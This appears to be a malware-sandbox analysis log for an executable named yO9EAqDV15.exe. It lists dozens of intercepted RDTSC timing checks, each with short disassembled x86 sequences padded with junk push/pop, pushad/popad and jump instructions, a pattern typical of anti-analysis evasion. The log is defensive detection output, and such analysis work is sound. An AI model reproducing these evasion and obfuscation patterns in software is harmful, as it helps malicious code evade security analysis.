              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6341 second address: ED6347 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED14F3 second address: ED1507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F08BA1E3Bh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED243A second address: ED2447 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED1507 second address: ED150B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED3633 second address: ED3637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED546C second address: ED5472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED647E second address: ED6495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64193h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED3637 second address: ED363B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6495 second address: ED6533 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F7F08F6418Ah 0x00000012 nop 0x00000013 mov di, 53A7h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F7F08F64188h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D2BC3h], ebx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov ebx, dword ptr [ebp+122D1D91h] 0x0000004b mov eax, dword ptr [ebp+122D1301h] 0x00000051 jmp 00007F7F08F64193h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007F7F08F64188h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 0000001Bh 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jne 00007F7F08F64186h 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED6533 second address: ED654C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F7F08BA1E38h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED04A0 second address: ED04A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED04A4 second address: ED04A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EB7 second address: EE0EBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EBC second address: EE0ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0ECB second address: EE0EE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F7F08F6418Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EE3 second address: EE0EED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0EED second address: EE0EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE076F second address: EE078B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F08BA1E3Ch 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE08EB second address: EE08EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A3A second address: EE0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F08BA1E3Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A4A second address: EE0A7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 jmp 00007F7F08F6418Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F7F08F64193h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A7C second address: EE0A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7F08BA1E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F7F08BA1E3Ah 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE0A92 second address: EE0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE4226 second address: EE422B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EE422B second address: EE426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jl 00007F7F08F64188h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F7F08F6418Bh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7F08F64199h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABB1 second address: EEABB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABB5 second address: EEABD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F08F6418Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEABD7 second address: EEAC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Fh 0x00000007 jmp 00007F7F08BA1E41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F7F08BA1E36h 0x0000001e jno 00007F7F08BA1E36h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC11 second address: EEAC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC15 second address: EEAC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAC1D second address: EEAC22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEAE09 second address: EEAE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0C2 second address: EEB0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0C6 second address: EEB0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EEB0CA second address: EEB0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F08F64193h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7097F second address: E7099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E46h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7099D second address: E709B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7F08F6418Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E709B6 second address: E709BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF30F8 second address: EF3104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F08F64188h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6B8D7 second address: E6B8DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E6B8DC second address: E6B8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F08F64186h 0x0000000a pop esi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8DB3 second address: EF8DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F7F08BA1E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7ACE second address: EF7AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7AD2 second address: EF7AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F08BA1E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7CB2 second address: EF7CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF7CB7 second address: EF7CEA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F08BA1E3Ch 0x00000008 jne 00007F7F08BA1E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F08BA1E49h 0x00000015 jmp 00007F7F08BA1E3Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8675 second address: EF8692 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F7F08F64191h 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF8692 second address: EF869C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F08BA1E42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF869C second address: EF86A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EF86A2 second address: EF86AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD425 second address: EFD431 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F08F64186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD431 second address: EFD437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC35DF second address: EC365C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08F64193h 0x00000008 jmp 00007F7F08F6418Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jc 00007F7F08F64186h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d jo 00007F7F08F64186h 0x00000023 pop eax 0x00000024 popad 0x00000025 nop 0x00000026 push ebx 0x00000027 xor dword ptr [ebp+122D1EECh], edx 0x0000002d pop edx 0x0000002e lea eax, dword ptr [ebp+1248E32Bh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F08F64188h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub dword ptr [ebp+122D2C2Eh], ecx 0x00000054 push eax 0x00000055 jnl 00007F7F08F64192h 0x0000005b jnl 00007F7F08F6418Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC3838 second address: EC3842 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F08BA1E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC41DA second address: EC41E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC41E0 second address: EC41E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC470E second address: EC4718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4718 second address: EC471D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC48DF second address: EC490A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F7F08F64194h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F7F08F64188h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC490A second address: EC490F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A12 second address: EC4A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7F08F64188h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007F7F08F6418Bh 0x00000027 add dword ptr [ebp+122D3553h], edx 0x0000002d pop edi 0x0000002e lea eax, dword ptr [ebp+1248E32Bh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F08F64188h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3651h] 0x00000054 nop 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A77 second address: EC4A89 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC4A89 second address: EA194A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D2BCDh], edi 0x00000010 movzx edi, dx 0x00000013 call dword ptr [ebp+122D299Bh] 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jl 00007F7F08F64186h 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD6EE second address: EFD70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F08BA1E36h 0x0000000a popad 0x0000000b js 00007F7F08BA1E49h 0x00000011 jmp 00007F7F08BA1E3Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC3B09 second address: EC3B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFD9EC second address: EFD9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFDD01 second address: EFDD12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F7F08F64186h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFE051 second address: EFE07F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7F08BA1E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F08BA1E3Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EFE07F second address: EFE083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02D0A second address: F02D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E44h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02D23 second address: F02D36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ch 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FA8 second address: F02FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FAE second address: F02FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7F08F64196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F02FCB second address: F02FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03133 second address: F03139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0368D second address: F03692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03692 second address: F03697 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F03AB9 second address: F03AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0764F second address: F07658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A794 second address: F0A7AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jc 00007F7F08BA1E36h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1C7 second address: F0A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1CF second address: F0A1E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F08BA1E3Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0A1E2 second address: F0A1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1048D second address: F104AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F08BA1E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F08BA1E3Fh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F104AA second address: F104AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
